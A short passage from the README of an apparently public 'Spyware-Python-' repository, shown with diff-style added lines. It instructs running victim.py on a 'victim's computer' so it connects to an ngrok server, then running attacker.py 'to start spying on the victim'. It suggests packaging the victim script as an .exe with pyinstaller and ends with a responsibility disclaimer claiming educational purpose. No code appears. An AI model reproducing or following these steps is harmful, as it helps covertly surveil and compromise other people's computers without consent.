Abubakar-ux/Spyware-Python-/README.md

 Step 5: Execute victim.py file in victim's computer to make a connection with the Server(ngrok URL).

 Step 6: Now, execute attacker.py file in attacker's computer to start spying on the victim.

+Note: An .exe for victim.py can be created via pyinstaller.
+I am not responsible for any misuse of this tool.
+This was for educational purposes.